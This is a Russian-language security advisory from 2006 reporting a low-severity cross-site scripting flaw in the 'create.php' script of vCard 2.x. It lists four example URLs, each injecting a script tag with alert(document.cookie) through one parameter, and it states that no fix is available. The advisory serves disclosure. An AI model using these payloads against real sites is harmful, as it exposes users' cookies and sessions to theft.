Межсайтовый скриптинг в vCard

Дата публикации:
15.03.2006
Всего просмотров:
1337
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
vCard 2.x
Уязвимые версии: vCard

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах "card_id", "uploaded", "card_fontsize" и "card_color" сценария "create.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://example.com/vcard/create.php?card_id='><script>alert(document.cookie)</script>

http://example.com/vcard/create.php?uploaded='><script>alert(document.cookie)</script>

http://example.com/vcard/create.php?card_fontsize='><script>alert(document.cookie)</script>

http://example.com/vcard/create.php?card_color='><script>alert(document.cookie)</script>

URL производителя: www.belchiorfoundry.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: XSS in vCard

или введите имя

CAPTCHA